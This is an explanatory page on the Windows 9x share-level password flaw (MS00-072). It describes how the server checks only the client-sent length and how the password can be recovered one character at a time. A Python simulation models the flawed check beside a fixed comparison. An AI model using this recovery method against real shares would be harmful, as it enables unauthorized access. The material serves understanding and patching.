Reveal Windows 9x Share Password

About the "Share-Level Password" Vulnerability

There is a flaw in the way Windows 95/98/Me verifies the password when a client connects to a shared folder: anyone who does not know the password can gain access to the share. This is known as the "Share-Level Password" vulnerability (Microsoft Security Bulletin MS00-072, CVE-2000-0979). A server that offers a share must check that the password supplied by the client matches the share password exactly. Instead, the server trusts the password length sent by the client (the PasswordLength field of the SMB tree-connect request) and, as a result, compares the real password against the client's password only up to the length the client sent.

For example, a client sends a one-character password. If that character matches the first character of the real password, the client is granted access to the share. Worse, the entire share password can be recovered through this vulnerability, one character at a time. Microsoft did not announce this consequence. Patches for the vulnerability are available from Microsoft; details and the patch are at the following URL.

NSFOCUS, which reported the vulnerability, also provides information at the following URL.

How to reveal the password

Here is how the password is revealed. First, the SMB client sets the password length to 1 and sends a one-character password to the server. It repeats this, changing the character each time, until the server grants access to the share, and then closes the connection. Next, the client sets the password length to 2, keeps the first character that succeeded, and cycles through candidates for the second character in the same way. It continues like this, extending the password by one position at a time, until it reaches a length of [actual password length + 1]; at that length every candidate fails, and the prefix found so far is the complete password. Because each position is guessed independently of the others, recovering a password of n characters costs at most n + 1 rounds of (character-set size) attempts, rather than the (character-set size)^n attempts of a blind brute force.
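The procedure above, as an added example that is not code from the original page or from the Windows 9x Share Password Scanner. The server side is a pure-Python model of the flawed tree-connect comparison, not an SMB implementation, and it is shown next to the correct full-length comparison so the same recovery loop can be run against both. The names (ShareServer, recover_password, vulnerable_check, fixed_check), the candidate character set and the 8-character upper bound are assumptions made for the example.

```python
"""Model of the flawed share-level password check and of the one-character-at-a-time
recovery it permits.  Added example: not code from the original page or from the
Windows 9x Share Password Scanner.  ShareServer is a pure-Python stand-in for the
server's tree-connect check, not an SMB implementation."""
import hmac
import string

# Assumption: the candidate characters tried for each position (upper case, digits
# and punctuation).  Adjust to whatever the target's password policy allows.
CHARSET = string.ascii_uppercase + string.digits + string.punctuation
MAX_PASSWORD_LEN = 8  # assumption: upper bound on a Windows 9x share password


def vulnerable_check(actual: str, sent: str) -> bool:
    """Flawed comparison as described on the page: the server trusts the password
    length sent by the client and compares only that many characters of the real
    share password, so any prefix of the real password is accepted."""
    return actual[:len(sent)] == sent


def fixed_check(actual: str, sent: str) -> bool:
    """Correct comparison: lengths must agree and every character must match.
    compare_digest also avoids leaking the mismatch position through timing."""
    return hmac.compare_digest(actual.encode(), sent.encode())


class ShareServer:
    """Stand-in for a share-level server.  ``checker`` selects the comparison the
    tree-connect uses; ``attempts`` counts tree-connect requests received."""

    def __init__(self, share_password: str, checker=vulnerable_check):
        self._password = share_password
        self._checker = checker
        self.attempts = 0

    def tree_connect(self, password: str) -> bool:
        """One SMB tree-connect with a plaintext password; True means access granted."""
        self.attempts += 1
        return self._checker(self._password, password)


def recover_password(server: ShareServer, charset: str = CHARSET,
                     max_len: int = MAX_PASSWORD_LEN):
    """Recover the share password one position at a time.

    Round k sends the k-1 characters already known plus one candidate for position
    k; the first candidate that gains access is kept.  A round in which every
    candidate fails is the [length + 1] case from the text, so the known prefix is
    the complete password.  Returns None if the server does not exhibit the prefix
    behaviour (e.g. it is patched) or the password is longer than max_len.  If a
    password character is outside charset, the prefix found so far is returned,
    since it still opens the share on a vulnerable server.
    """
    known = ""
    while len(known) <= max_len:
        for candidate in charset:
            if server.tree_connect(known + candidate):
                known += candidate        # position len(known) found; move on
                break
        else:
            # Every candidate failed: confirm the prefix really opens the share.
            # A patched server rejects every prefix, so only a share with an
            # empty password would be confirmed here.
            return known if server.tree_connect(known) else None
    return None


if __name__ == "__main__":
    vuln = ShareServer("S3CR3T")                 # constructed sample share password
    found = recover_password(vuln)
    print(f"vulnerable server: recovered {found!r} in {vuln.attempts} tree-connects")

    patched = ShareServer("S3CR3T", checker=fixed_check)
    print(f"patched server: recovered {recover_password(patched)!r} "
          f"after {patched.attempts} tree-connects")
```

Running the module shows the asymmetry the page describes: against the vulnerable comparison the six-character password is recovered in well under 7 * len(CHARSET) tree-connects, while against the full-length comparison the first round fails outright and the loop gives up after one round.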

The following conditions are necessary for this to succeed.

 1) The server uses share-level access control, in which no account name is needed for authentication (Windows 95/98/Me).

 2) The SMB client can send a plaintext password.
* An SMB client normally sends an encrypted (challenge/response) password when the server asks for one, so the client must be able to ignore that and send plaintext instead.

 3) The SMB client can set the password and the password length field independently of each other.

"Windows 9x Share Password Scanner" reveals the passwords of all the shared folders on a server. It will be uploaded soon. The tool is useful when you have forgotten the password of a shared folder. Against a server with the Microsoft patch applied, a partial password is no longer accepted, so the scanner cannot recover anything.

